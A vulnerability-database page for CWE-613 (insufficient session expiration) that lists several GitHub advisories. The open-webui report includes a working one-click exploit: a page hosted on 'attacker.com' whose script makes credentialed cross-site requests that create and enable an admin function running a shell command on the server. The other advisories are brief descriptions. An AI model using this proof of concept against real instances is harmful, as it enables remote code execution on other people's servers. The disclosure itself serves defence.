CWE-613
Allowed-with-ReviewInsufficient Session Expiration
Abstraction: Base · Status: Incomplete
According to WASC, "Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization."
876 vulnerabilities reference this CWE, most recent first.
GHSA-6XCP-7MPR-M7WM
Vulnerability from github – Published: 2026-05-11 14:02 – Updated: 2026-05-11 14:02GitHub Security Lab (GHSL) Vulnerability Report, open-webui: GHSL-2024-174, GHSL-2024-175
The GitHub Security Lab team has identified potential security vulnerabilities in open-webui.
We are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team.
If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at securitylab@github.com (please include GHSL-2024-174 or GHSL-2024-175 as a reference). See also this blog post written by GitHub's Advisory Curation team which explains what CVEs and advisories are, why they are important to track vulnerabilities and keep downstream users informed, the CVE assigning process, and how they are used to keep open source software secure.
If you are NOT the correct point of contact for this report, please let us know!
Summary
Due to a CORS misconfiguration and session validation issue, an attacker may be able to perform a 1 click attack against browsers with admin access to openwebui, resulting in remote code execution in the openwebui instance. The openwebui application runs as root in Docker container's default setup, which allows for complete compromise of the container.
Project
open-webui
Tested Version
Details
Issue 1: CORS misconfiguration on multiple routers (GHSL-2024-174)
CORS misconfigurations exist on multiple routers of open-webui which results in allowing arbitrary websites to make authenticated cross site requests to openwebui. Accounts with access to the /api/v1/functions endpoint (admins) can execute arbitrary code on the openwebui instance.
The following pattern occurs at the following routers: 1. backend/apps/webui/main.py 2. backend/apps/audio/main.py 3. backend/apps/images/main.py 4. backend/apps/rag/main.py 5. backend/apps/openai/main.py 6. backend/apps/ollama/main.py 7. backend/main.py
app.add_middleware(
CORSMiddleware,
allow_origins=["*"],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
Impact
This issue may lead to Remote Code Execution.
Remediation
The FastAPI CORS middleware is not safe by default, meaning it reflects the origin when specifying allow_origins=["*"]. Remove the vulnerable, broad origin and allow users to dynamically setup the exact allowed origins via the administration panel or config file, do not allow for broad origins such as "*" or "*.com"
Proof of Concept
Host the following code on your website, attacker.com. Open the webpage using Firefox, and click on the webpage as instructed. Check your openwebui host to see the result of the command whoami placed into a newly created file /tmp/whoami.txt. Ensure you have logged into an admin open-webui account
<body>
<p>Click here to login.</p>
<div id="response"></div>
<script>
//Firefox cross site cookie request bypass
const url = 'http://localhost:3000/static/favicon.png';
document.addEventListener("DOMContentLoaded", () => {
document.onclick = () => {
open(url);
filter_id = "okok"
//Create a function/filter to write code
fetch('http://localhost:3000/api/v1/functions/create', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({
"id": filter_id,
"name": "test2",
"meta": {"description": "test2"},
"content": "from pydantic import BaseModel, Field\nfrom typing import Optional\n\n\nclass Filter:\n class Valves(BaseModel):\n priority: int = Field(\n default=0, description=\"Priority level for the filter operations.\"\n )\n max_turns: int = Field(\n default=8, description=\"Maximum allowable conversation turns for a user.\"\n )\n pass\n\n class UserValves(BaseModel):\n max_turns: int = Field(\n default=4, description=\"Maximum allowable conversation turns for a user.\"\n )\n pass\n\n def __init__(self):\n # Indicates custom file handling logic. This flag helps disengage default routines in favor of custom\n # implementations, informing the WebUI to defer file-related operations to designated methods within this class.\n # Alternatively, you can remove the files directly from the body in from the inlet hook\n # self.file_handler = True\n\n # Initialize 'valves' with specific configurations. Using 'Valves' instance helps encapsulate settings,\n # which ensures settings are managed cohesively and not confused with operational flags like 'file_handler'.\n self.valves = self.Valves()\n f = open(\"/tmp/whoami.txt\", \"w\")\n import subprocess\n\n output = subprocess.getoutput(\"whoami\")\n f.write(output)\n f.close()\n pass\n\n def inlet(self, body: dict, __user__: Optional[dict] = None) -> dict:\n return body\n\n def outlet(self, body: dict, __user__: Optional[dict] = None) -> dict:\n return body\n"
}),
credentials: 'include' // This will send cookies from the origin
})
.then(response => response.json())
.then(data => console.log(data))
.catch((error) => console.error('Error:', error));
//Toggle the filter to execute code
fetch(`http://localhost:3000/api/v1/functions/id/${filter_id}/toggle`, {
method: 'POST',
credentials: 'include' // This will send cookies from the origin
})
.then(response => response.json())
.then(data => console.log(data))
.catch((error) => console.error('Error:', error));
}
});
</script>
</body>
Issue 2: Failure to Invalidate Session on Logout (GHSL-2024-175)
Openwebui fails to invalidate and clear session cookies after logout. In fact, it seems to reuse the same session cookies. This allows an attacker who has access to previous session cookie details to login at a later point as long as the victim has not closed their browser.
This vulnerability is relevant to the above CORS issue because it no longer requires the user to be logged in to exploit. If the cookie had been properly invalidated/cleared, the CORS issue would only affect logged in users.
Impact
This issue may increase the impact of primitives gained from other security issues.
Remediation
For every session, new cookies should be generated. When a user logouts, the session cookies from the previous session should be invalidated and removed from the browser's storage.
Resources
OWASP Recommendation On Sessions
GitHub Security Advisories
We recommend you create a private GitHub Security Advisory for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are published.
Credit
These issues were discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-174 or GHSL-2024-175 in any communication regarding these issues.
Disclosure Policy
This report is subject to a 90-day disclosure deadline, as described in more detail in our coordinated disclosure policy.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.3.33"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-613"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-11T14:02:04Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "# GitHub Security Lab (GHSL) Vulnerability Report, open-webui: `GHSL-2024-174`, `GHSL-2024-175`\n\nThe [GitHub Security Lab](https://securitylab.github.com) team has identified potential security vulnerabilities in [open-webui](https://github.com/open-webui/open-webui).\n\nWe are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team.\n\nIf at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2024-174` or `GHSL-2024-175` as a reference). See also [this blog post](https://github.blog/2022-04-22-removing-the-stigma-of-a-cve/) written by GitHub\u0027s Advisory Curation team which explains what CVEs and advisories are, why they are important to track vulnerabilities and keep downstream users informed, the CVE assigning process, and how they are used to keep open source software secure.\n\nIf you are _NOT_ the correct point of contact for this report, please let us know!\n\n## Summary\n\nDue to a CORS misconfiguration and session validation issue, an attacker may be able to perform a 1 click attack against browsers with admin access to openwebui, resulting in remote code execution in the openwebui instance. The openwebui application runs as root in Docker container\u0027s default setup, which allows for complete compromise of the container.\n\n## Project\n\nopen-webui\n\n## Tested Version\n\n[v0.3.10](https://github.com/open-webui/open-webui/releases/tag/v0.3.10)\n\n## Details\n\n### Issue 1: CORS misconfiguration on multiple routers (`GHSL-2024-174`)\n\nCORS misconfigurations exist on multiple routers of open-webui which results in allowing arbitrary websites to make authenticated cross site requests to openwebui. Accounts with access to the `/api/v1/functions` endpoint (admins) can execute arbitrary code on the openwebui instance. \n\nThe following pattern occurs at the following routers:\n1. [backend/apps/webui/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/webui/main.py#L92)\n2. [backend/apps/audio/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/audio/main.py#L58)\n3. [backend/apps/images/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/images/main.py#L60)\n4. [backend/apps/rag/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/rag/main.py#L246)\n5. [backend/apps/openai/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/openai/main.py#L47)\n6. [backend/apps/ollama/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/ollama/main.py#L62)\n7. [backend/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/main.py#L881)\n```python\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n```\n\n#### Impact\n\nThis issue may lead to `Remote Code Execution`.\n\n#### Remediation\n\nThe FastAPI CORS middleware is not safe by default, meaning it reflects the origin when specifying `allow_origins=[\"*\"]`. Remove the vulnerable, broad origin and allow users to dynamically setup the exact allowed origins via the administration panel or config file, do not allow for broad origins such as `\"*\"` or `\"*.com\"`\n\n#### Proof of Concept\n\nHost the following code on your website, `attacker.com`. Open the webpage using Firefox, and click on the webpage as instructed. Check your openwebui host to see the result of the command `whoami` placed into a newly created file `/tmp/whoami.txt`. Ensure you have logged into an admin open-webui account \n```javascript\n\u003cbody\u003e\n \u003cp\u003eClick here to login.\u003c/p\u003e\n \u003cdiv id=\"response\"\u003e\u003c/div\u003e\n \n \u003cscript\u003e\n //Firefox cross site cookie request bypass\n const url = \u0027http://localhost:3000/static/favicon.png\u0027;\n document.addEventListener(\"DOMContentLoaded\", () =\u003e {\n document.onclick = () =\u003e {\n open(url);\n filter_id = \"okok\"\n//Create a function/filter to write code\nfetch(\u0027http://localhost:3000/api/v1/functions/create\u0027, {\n method: \u0027POST\u0027,\n headers: {\n \u0027Content-Type\u0027: \u0027application/json\u0027\n },\n body: JSON.stringify({\n \"id\": filter_id,\n \"name\": \"test2\",\n \"meta\": {\"description\": \"test2\"},\n \"content\": \"from pydantic import BaseModel, Field\\nfrom typing import Optional\\n\\n\\nclass Filter:\\n class Valves(BaseModel):\\n priority: int = Field(\\n default=0, description=\\\"Priority level for the filter operations.\\\"\\n )\\n max_turns: int = Field(\\n default=8, description=\\\"Maximum allowable conversation turns for a user.\\\"\\n )\\n pass\\n\\n class UserValves(BaseModel):\\n max_turns: int = Field(\\n default=4, description=\\\"Maximum allowable conversation turns for a user.\\\"\\n )\\n pass\\n\\n def __init__(self):\\n # Indicates custom file handling logic. This flag helps disengage default routines in favor of custom\\n # implementations, informing the WebUI to defer file-related operations to designated methods within this class.\\n # Alternatively, you can remove the files directly from the body in from the inlet hook\\n # self.file_handler = True\\n\\n # Initialize \u0027valves\u0027 with specific configurations. Using \u0027Valves\u0027 instance helps encapsulate settings,\\n # which ensures settings are managed cohesively and not confused with operational flags like \u0027file_handler\u0027.\\n self.valves = self.Valves()\\n f = open(\\\"/tmp/whoami.txt\\\", \\\"w\\\")\\n import subprocess\\n\\n output = subprocess.getoutput(\\\"whoami\\\")\\n f.write(output)\\n f.close()\\n pass\\n\\n def inlet(self, body: dict, __user__: Optional[dict] = None) -\u003e dict:\\n return body\\n\\n def outlet(self, body: dict, __user__: Optional[dict] = None) -\u003e dict:\\n return body\\n\"\n }),\n credentials: \u0027include\u0027 // This will send cookies from the origin\n})\n.then(response =\u003e response.json())\n.then(data =\u003e console.log(data))\n.catch((error) =\u003e console.error(\u0027Error:\u0027, error)); \n\n\n//Toggle the filter to execute code\nfetch(`http://localhost:3000/api/v1/functions/id/${filter_id}/toggle`, {\n method: \u0027POST\u0027,\n credentials: \u0027include\u0027 // This will send cookies from the origin\n})\n.then(response =\u003e response.json())\n.then(data =\u003e console.log(data))\n.catch((error) =\u003e console.error(\u0027Error:\u0027, error)); \n }\n });\n \u003c/script\u003e\n \u003c/body\u003e\n```\n\n### Issue 2: Failure to Invalidate Session on Logout (`GHSL-2024-175`)\n\nOpenwebui fails to invalidate and clear session cookies after logout. In fact, it seems to reuse the same session cookies. This allows an attacker who has access to previous session cookie details to login at a later point as long as the victim has not closed their browser.\n\nThis vulnerability is relevant to the above CORS issue because it no longer requires the user to be logged in to exploit. If the cookie had been properly invalidated/cleared, the CORS issue would only affect logged in users. \n\n#### Impact\n\nThis issue may increase the impact of primitives gained from other security issues.\n\n#### Remediation\n\nFor every session, new cookies should be generated. When a user logouts, the session cookies from the previous session should be invalidated and removed from the browser\u0027s storage.\n\n#### Resources\n[OWASP Recommendation On Sessions](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)\n\n## GitHub Security Advisories\n\nWe recommend you create a private [GitHub Security Advisory](https://help.github.com/en/github/managing-security-vulnerabilities/creating-a-security-advisory) for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are [published](https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory).\n\n## Credit\n\nThese issues were discovered and reported by GHSL team member [@Kwstubbs (Kevin Stubbings)](https://github.com/Kwstubbs).\n\n## Contact\n\nYou can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2024-174` or `GHSL-2024-175` in any communication regarding these issues.\n\n## Disclosure Policy\n\nThis report is subject to a 90-day disclosure deadline, as described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).",
"id": "GHSA-6xcp-7mpr-m7wm",
"modified": "2026-05-11T14:02:04Z",
"published": "2026-05-11T14:02:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-6xcp-7mpr-m7wm"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Open WebUI has a CORS misconfiguration and session validation issue"
}
GHSA-72PV-QVJJ-JQ58
Vulnerability from github – Published: 2025-10-26 18:30 – Updated: 2025-11-10 15:31Logout Functionality not Working.This issue affects BLU-IC2: through 1.19.5; BLU-IC4: through 1.19.5.
{
"affected": [],
"aliases": [
"CVE-2025-12278"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-613"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-26T17:15:52Z",
"severity": "MODERATE"
},
"details": "Logout Functionality not Working.This issue affects BLU-IC2: through 1.19.5; BLU-IC4: through 1.19.5.",
"id": "GHSA-72pv-qvjj-jq58",
"modified": "2025-11-10T15:31:03Z",
"published": "2025-10-26T18:30:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12278"
},
{
"type": "WEB",
"url": "https://azure-access.com/security-advisories"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-73VJ-WXR6-3PQ5
Vulnerability from github – Published: 2022-05-24 16:47 – Updated: 2024-04-04 00:53The Pivotal Ops Manager, 2.2.x versions prior to 2.2.23, 2.3.x versions prior to 2.3.16, 2.4.x versions prior to 2.4.11, and 2.5.x versions prior to 2.5.3, contain configuration that circumvents refresh token expiration. A remote authenticated user can gain access to a browser session that was supposed to have expired, and access Ops Manager resources.
{
"affected": [],
"aliases": [
"CVE-2019-3790"
],
"database_specific": {
"cwe_ids": [
"CWE-324",
"CWE-613"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-06-06T19:29:00Z",
"severity": "MODERATE"
},
"details": "The Pivotal Ops Manager, 2.2.x versions prior to 2.2.23, 2.3.x versions prior to 2.3.16, 2.4.x versions prior to 2.4.11, and 2.5.x versions prior to 2.5.3, contain configuration that circumvents refresh token expiration. A remote authenticated user can gain access to a browser session that was supposed to have expired, and access Ops Manager resources.",
"id": "GHSA-73vj-wxr6-3pq5",
"modified": "2024-04-04T00:53:33Z",
"published": "2022-05-24T16:47:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3790"
},
{
"type": "WEB",
"url": "https://pivotal.io/security/cve-2019-3790"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/108512"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7429-79P7-VGCX
Vulnerability from github – Published: 2025-10-31 00:30 – Updated: 2025-11-06 18:32Nagios XI versions prior to 2024R1.1.3 did not invalidate all other active sessions for a user when that user's password was changed. As a result, any pre-existing sessions (including those potentially controlled by an attacker) remained valid after a credential update. This insufficient session expiration could allow continued unauthorized access to user data and actions even after a password change.
{
"affected": [],
"aliases": [
"CVE-2024-13996"
],
"database_specific": {
"cwe_ids": [
"CWE-613"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-30T22:15:45Z",
"severity": "CRITICAL"
},
"details": "Nagios XI versions prior to\u00a02024R1.1.3\u00a0did not invalidate all other active sessions for a user when that user\u0027s password was changed. As a result, any pre-existing sessions (including those potentially controlled by an attacker) remained valid after a credential update. This insufficient session expiration could allow continued unauthorized access to user data and actions even after a password change.",
"id": "GHSA-7429-79p7-vgcx",
"modified": "2025-11-06T18:32:47Z",
"published": "2025-10-31T00:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13996"
},
{
"type": "WEB",
"url": "https://www.nagios.com/changelog/nagios-xi"
},
{
"type": "WEB",
"url": "https://www.nagios.com/products/security/#nagios-xi"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/nagios-xi-session-not-invalidated-after-password-change"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-742J-JCFR-23W3
Vulnerability from github – Published: 2022-05-13 01:01 – Updated: 2022-06-29 14:08Users who cached their CLI authentication before Jenkins was updated to 2.150.2 and newer, or 2.160 and newer, would remain authenticated in Jenkins 2.171 and earlier and Jenkins LTS 2.164.1 and earlier, because the fix for CVE-2019-1003004 in these releases did not reject existing remoting-based CLI authentication caches.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.164.1"
},
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.main:jenkins-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.164.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.171"
},
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.main:jenkins-core"
},
"ranges": [
{
"events": [
{
"introduced": "2.165"
},
{
"fixed": "2.172"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-1003049"
],
"database_specific": {
"cwe_ids": [
"CWE-613"
],
"github_reviewed": true,
"github_reviewed_at": "2022-06-29T14:08:39Z",
"nvd_published_at": "2019-04-10T21:29:00Z",
"severity": "HIGH"
},
"details": "Users who cached their CLI authentication before Jenkins was updated to 2.150.2 and newer, or 2.160 and newer, would remain authenticated in Jenkins 2.171 and earlier and Jenkins LTS 2.164.1 and earlier, because the fix for CVE-2019-1003004 in these releases did not reject existing remoting-based CLI authentication caches.",
"id": "GHSA-742j-jcfr-23w3",
"modified": "2022-06-29T14:08:39Z",
"published": "2022-05-13T01:01:01Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003049"
},
{
"type": "WEB",
"url": "https://github.com/jenkinsci/jenkins/commit/0eeaa087aac192fb39f52928be5a5bbf16627ea6"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHBA-2019:1605"
},
{
"type": "PACKAGE",
"url": "https://github.com/jenkinsci/jenkins"
},
{
"type": "WEB",
"url": "https://jenkins.io/security/advisory/2019-04-10/#SECURITY-1289"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/107901"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Insufficient Session Expiration in Jenkins"
}
GHSA-74XH-52QM-QF5R
Vulnerability from github – Published: 2022-05-24 16:47 – Updated: 2024-04-04 00:53Progress Sitefinity 10.1.6536 does not invalidate session cookies upon logouts. It instead tries to overwrite the cookie in the browser, but it remains valid on the server side. This means the cookie can be reused to maintain access to the account, even if the account credentials and permissions are changed.
{
"affected": [],
"aliases": [
"CVE-2019-7215"
],
"database_specific": {
"cwe_ids": [
"CWE-613"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-06-06T17:29:00Z",
"severity": "MODERATE"
},
"details": "Progress Sitefinity 10.1.6536 does not invalidate session cookies upon logouts. It instead tries to overwrite the cookie in the browser, but it remains valid on the server side. This means the cookie can be reused to maintain access to the account, even if the account credentials and permissions are changed.",
"id": "GHSA-74xh-52qm-qf5r",
"modified": "2024-04-04T00:53:44Z",
"published": "2022-05-24T16:47:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7215"
},
{
"type": "WEB",
"url": "https://knowledgebase.progress.com/#sort=relevancy\u0026f:%40objecttypelabel=%5BProduct%20Alert%5D"
},
{
"type": "WEB",
"url": "https://knowledgebase.progress.com/#sort=relevancy\u0026f:@objecttypelabel=[Product%20Alert]"
},
{
"type": "WEB",
"url": "https://knowledgebase.progress.com/articles/Article/Security-Advisory-For-Resolving-Security-Vulnerabilities-May-2019"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7547-299X-4PMV
Vulnerability from github – Published: 2022-01-11 00:00 – Updated: 2022-01-20 00:02Improper session management vulnerability in Samsung Health prior to 6.20.1.005 prevents logging out from Samsung Health App.
{
"affected": [],
"aliases": [
"CVE-2022-22283"
],
"database_specific": {
"cwe_ids": [
"CWE-613"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-01-10T14:12:00Z",
"severity": "LOW"
},
"details": "Improper session management vulnerability in Samsung Health prior to 6.20.1.005 prevents logging out from Samsung Health App.",
"id": "GHSA-7547-299x-4pmv",
"modified": "2022-01-20T00:02:52Z",
"published": "2022-01-11T00:00:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22283"
},
{
"type": "WEB",
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022\u0026month=1"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-757P-7HP5-PQMR
Vulnerability from github – Published: 2023-07-06 21:14 – Updated: 2023-07-06 23:13Insufficient Session Expiration vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.6.0.
An old session can be used by an attacker even after the user has been deleted or the password has been changed.
Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7836 or https://github.com/apache/inlong/pull/7884 to solve it.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.inlong:manager-pojo"
},
"ranges": [
{
"events": [
{
"introduced": "1.4.0"
},
{
"fixed": "1.7.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.inlong:manager-dao"
},
"ranges": [
{
"events": [
{
"introduced": "1.4.0"
},
{
"fixed": "1.7.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.inlong:manager-web"
},
"ranges": [
{
"events": [
{
"introduced": "1.4.0"
},
{
"fixed": "1.7.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.inlong:manager-service"
},
"ranges": [
{
"events": [
{
"introduced": "1.4.0"
},
{
"fixed": "1.7.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-31065"
],
"database_specific": {
"cwe_ids": [
"CWE-613"
],
"github_reviewed": true,
"github_reviewed_at": "2023-07-06T23:13:58Z",
"nvd_published_at": "2023-05-22T16:15:10Z",
"severity": "CRITICAL"
},
"details": "Insufficient Session Expiration vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.6.0.\u00a0\n\nAn old session can be used by an attacker even after the user has been deleted or the password has been changed.\n\nUsers are advised to upgrade to Apache InLong\u0027s 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7836 or https://github.com/apache/inlong/pull/7884 to solve it.",
"id": "GHSA-757p-7hp5-pqmr",
"modified": "2023-07-06T23:13:58Z",
"published": "2023-07-06T21:14:59Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31065"
},
{
"type": "WEB",
"url": "https://github.com/apache/inlong/pull/7836"
},
{
"type": "WEB",
"url": "https://github.com/apache/inlong/pull/7884"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/inlong"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/to7o0n2cks0omtwo6mhh5cs2vfdbplqf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Apache InLong Insufficient Session Expiration vulnerability"
}
GHSA-76F5-R74W-9H63
Vulnerability from github – Published: 2024-11-12 15:30 – Updated: 2024-11-12 15:30A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 3). The affected application does not properly invalidate sessions when the associated user is deleted or disabled or their permissions are modified. This could allow an authenticated attacker to continue performing malicious actions even after their user account has been disabled.
{
"affected": [],
"aliases": [
"CVE-2024-46892"
],
"database_specific": {
"cwe_ids": [
"CWE-613"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-11-12T13:15:09Z",
"severity": "MODERATE"
},
"details": "A vulnerability has been identified in SINEC INS (All versions \u003c V1.0 SP2 Update 3). The affected application does not properly invalidate sessions when the associated user is deleted or disabled or their permissions are modified. This could allow an authenticated attacker to continue performing malicious actions even after their user account has been disabled.",
"id": "GHSA-76f5-r74w-9h63",
"modified": "2024-11-12T15:30:42Z",
"published": "2024-11-12T15:30:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46892"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-915275.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-77MJ-XGFX-FXP2
Vulnerability from github – Published: 2026-03-04 18:31 – Updated: 2026-03-05 15:302N Access Commander version 3.4.2 and prior improperly invalidates session tokens, allowing multiple session cookies to remain active after logout in web application.
{
"affected": [],
"aliases": [
"CVE-2025-59786"
],
"database_specific": {
"cwe_ids": [
"CWE-613"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-04T16:16:25Z",
"severity": "MODERATE"
},
"details": "2N Access Commander version 3.4.2 and prior improperly invalidates session tokens, allowing multiple session cookies to remain active after logout in web application.",
"id": "GHSA-77mj-xgfx-fxp2",
"modified": "2026-03-05T15:30:35Z",
"published": "2026-03-04T18:31:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59786"
},
{
"type": "WEB",
"url": "https://www.2n.com/en-GB/download/cve_2025_59786_acom_3_5_v1pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
Mitigation
Set sessions/credentials expiration date.
No CAPEC attack patterns related to this CWE.